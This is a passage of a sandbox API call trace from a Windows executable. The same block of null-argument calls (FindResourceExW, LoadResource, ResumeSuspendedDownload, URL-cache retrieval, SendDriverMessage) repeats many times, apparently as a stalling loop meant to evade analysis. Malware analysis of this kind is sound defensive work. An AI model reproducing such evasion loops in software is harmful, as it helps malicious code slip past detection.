FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.768] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.768] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.768] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.768] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.768] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.768] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.768] GetUserDefaultLangID () returned 0x409 [0185.768] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.768] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.768] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.768] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.768] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.768] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.768] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.768] GetUserDefaultLangID () returned 0x409 [0185.768] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.768] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.768] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.768] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.768] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.768] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.768] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.768] GetUserDefaultLangID () returned 0x409 [0185.768] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.768] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.768] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.768] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.768] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.768] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.768] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.768] GetUserDefaultLangID () returned 0x409 [0185.769] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.769] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.769] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.769] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.769] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.769] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.769] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.769] GetUserDefaultLangID () returned 0x409 [0185.769] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.769] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.769] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.769] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.769] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.769] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.769] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.769] GetUserDefaultLangID () returned 0x409 [0185.769] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.769] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.769] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.769] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.769] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.769] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.769] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.769] GetUserDefaultLangID () returned 0x409 [0185.769] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.769] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.769] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.769] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.769] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.769] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.769] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.769] GetUserDefaultLangID () returned 0x409 [0185.769] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.769] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.769] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.769] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.769] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.769] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.769] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.769] GetUserDefaultLangID () returned 0x409 [0185.769] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.769] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.769] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.769] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.769] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.769] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.769] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.770] GetUserDefaultLangID () returned 0x409 [0185.770] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.770] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.770] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.770] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.770] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.770] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.770] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.770] GetUserDefaultLangID () returned 0x409 [0185.770] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.770] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.770] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.770] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.770] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.770] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.770] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.770] GetUserDefaultLangID () returned 0x409 [0185.770] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.770] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.770] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.770] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.770] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.770] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.770] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.770] GetUserDefaultLangID () returned 0x409 [0185.770] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.770] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.770] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.770] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.770] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.770] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.770] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.770] GetUserDefaultLangID () returned 0x409 [0185.770] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.770] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.770] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.770] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.770] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.770] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.770] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.770] GetUserDefaultLangID () returned 0x409 [0185.770] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.770] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.770] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.770] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.770] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.771] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.771] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.771] GetUserDefaultLangID () returned 0x409 [0185.771] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.771] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.771] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.772] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.772] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.772] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.772] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.772] GetUserDefaultLangID () returned 0x409 [0185.772] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.772] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.772] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.772] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.772] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.772] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.772] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.772] GetUserDefaultLangID () returned 0x409 [0185.772] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.772] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.772] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.772] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.772] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.772] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.772] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.772] GetUserDefaultLangID () returned 0x409 [0185.772] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.772] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.772] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.772] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.772] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.772] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.772] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.772] GetUserDefaultLangID () returned 0x409 [0185.772] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.772] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.772] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.772] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.772] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.772] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.772] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.772] GetUserDefaultLangID () returned 0x409 [0185.772] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.772] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.772] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.772] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.772] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.772] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.772] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.772] GetUserDefaultLangID () returned 0x409 [0185.772] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.773] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.773] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.773] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.773] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.773] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.773] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.773] GetUserDefaultLangID () returned 0x409 [0185.773] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.773] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.773] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.773] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.773] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.773] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.773] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.773] GetUserDefaultLangID () returned 0x409 [0185.773] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.773] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.773] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.773] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.773] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.773] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.773] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.773] GetUserDefaultLangID () returned 0x409 [0185.773] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.773] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.773] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.773] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.773] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.773] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.773] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.773] GetUserDefaultLangID () returned 0x409 [0185.773] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.773] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.773] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.773] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.773] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.773] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.773] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, 